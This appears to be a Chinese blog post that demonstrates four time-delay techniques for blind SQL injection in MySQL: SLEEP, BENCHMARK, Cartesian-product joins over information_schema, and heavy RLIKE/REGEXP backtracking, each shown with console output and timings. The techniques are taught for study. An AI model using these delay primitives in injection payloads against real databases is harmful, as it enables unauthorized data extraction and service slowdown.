SQL注入-四个延时注入的手法

October 20, 2020 WEB安全 访问: 110 次

sleep

不用多说

benchmark

BENCHMARK(count,expr)
BENCHMARK()函数重复countTimes次执行表达式expr,它可以用于计时MySQL处理表达式有多快。结果值总是0。意欲用于mysql客户,它报告查询的执行时间。
mysql> select BENCHMARK(1000000,encode("hello","goodbye"));
+----------------------------------------------+
| BENCHMARK(1000000,encode("hello","goodbye")) |
+----------------------------------------------+
| 0 |
+----------------------------------------------+
1 row in set (4.74 sec)

把某一个运算重复执行count次,以至于达到延时的作用

mysql> select sha(123);
+------------------------------------------+
| sha(123)                                 |
+------------------------------------------+
| 40bd001563085fc35165329ea1ff5c5ecbdbbeef |
+------------------------------------------+
1 row in set (0.00 sec)

mysql> select benchmark(1000000000,sha(123));
+--------------------------------+
| benchmark(1000000000,sha(123)) |
+--------------------------------+
|                              0 |
+--------------------------------+
1 row in set (3 min 26.42 sec)

mysql> 

笛卡尔积

mysql> SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
+------------+
| count(*)   |
+------------+
| 3472910593 |
+------------+
1 row in set (2 min 31.98 sec)

mysql> use test;

大量的正则匹配

Rlikeregexp

mysql> select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');
+-------------------------------------------------------------+
| rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b') |
+-------------------------------------------------------------+
|                                                           0 |
+-------------------------------------------------------------+
1 row in set (5.30 sec)

mysql> select rpad('a',4999999,'a') regexp concat(repeat('(a.*)+',30),'b');
+--------------------------------------------------------------+
| rpad('a',4999999,'a') regexp concat(repeat('(a.*)+',30),'b') |
+--------------------------------------------------------------+
|                                                            0 |
+--------------------------------------------------------------+
1 row in set (5.30 sec)

mysql> 

添加新评论